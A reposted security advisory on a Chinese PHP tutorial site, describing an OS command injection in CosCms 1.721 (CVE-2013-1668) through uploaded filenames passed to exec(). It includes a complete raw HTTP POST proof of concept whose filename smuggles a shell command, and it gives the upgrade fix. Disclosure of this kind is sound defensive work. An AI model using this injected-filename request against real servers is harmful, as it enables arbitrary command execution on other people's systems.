网站地图    收藏   

主页 > 后端 > 网站安全 >

CosCms 1.721 - OS命令注入 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 影响产品: CosCms开发者: http://www.coscms.org缺陷影响版本: 1.721 and probably prior已测试版本: 1.721分析:High-Tech Bridge Security Research Lab discovered vulnerability in CosCms, ......

影响产品: CosCms
开发者: http://www.coscms.org
缺陷影响版本: 1.721 and probably prior
已测试版本: 1.721
 
分析:
High-Tech Bridge Security Research Lab discovered vulnerability in CosCms, which can be exploited to execute arbitrary OS commands on web server where the vulnerable application is hosted.
 
 
1) OS Command Injection in CosCms: CVE-2013-1668
 
Vulnerability exists due to insufficient validation of user-supplied input in "$_FILES['file']['name']" variable passed to "/gallery/upload/index" URL before using it in PHP "exec()" function. A remote attacker can send a specially crafted HTTP POST request containing a malicious filename, and execute arbitrary commands on the target system with privileges of the web server.
 
The following PoC (Proof of Concept) code will write output of "ls -la" command into "/gallery/upload/file.txt" file. You can use any tool to send raw HTTP requests, e.g. telnet:
 
 
 
POST /gallery/upload/index HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------21456260222104
Content-Length: 970 www.2cto.com
 
-----------------------------21456260222104
Content-Disposition: form-data; name="title"
 
1
-----------------------------21456260222104
Content-Disposition: form-data; name="image_add"
 
1
-----------------------------21456260222104
Content-Disposition: form-data; name="description"
 
1
-----------------------------21456260222104
Content-Disposition: form-data; name="tags"
 
 
-----------------------------21456260222104
Content-Disposition: form-data; name="MAX_FILE_SIZE"
 
100000000
-----------------------------21456260222104
Content-Disposition: form-data; name="APC_UPLOAD_PROGRESS"
 
511ad0922b50f
-----------------------------21456260222104
Content-Disposition: form-data; name="file"; filename="1 & ls -la > file.txt"
Content-Type: application/octet-stream
 
1
 
-----------------------------21456260222104
Content-Disposition: form-data; name="submit"
 
Update
-----------------------------21456260222104-- 
 
 
 
Successful exploitation of this vulnerability requires an attacker to be logged-in and have privileges to upload files. User registration is disabled by default.
 
解决方案:
 
升级到 CosCms 1.822
 
More Information:
http://www.coscms.org/blog/view/4/Version-1.822
https://github.com/diversen/gallery/blob/master/upload/index.php
https://github.com/diversen/gallery/commit/7d58f870e8edc6597485dd1b80ea9fb78580190c
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论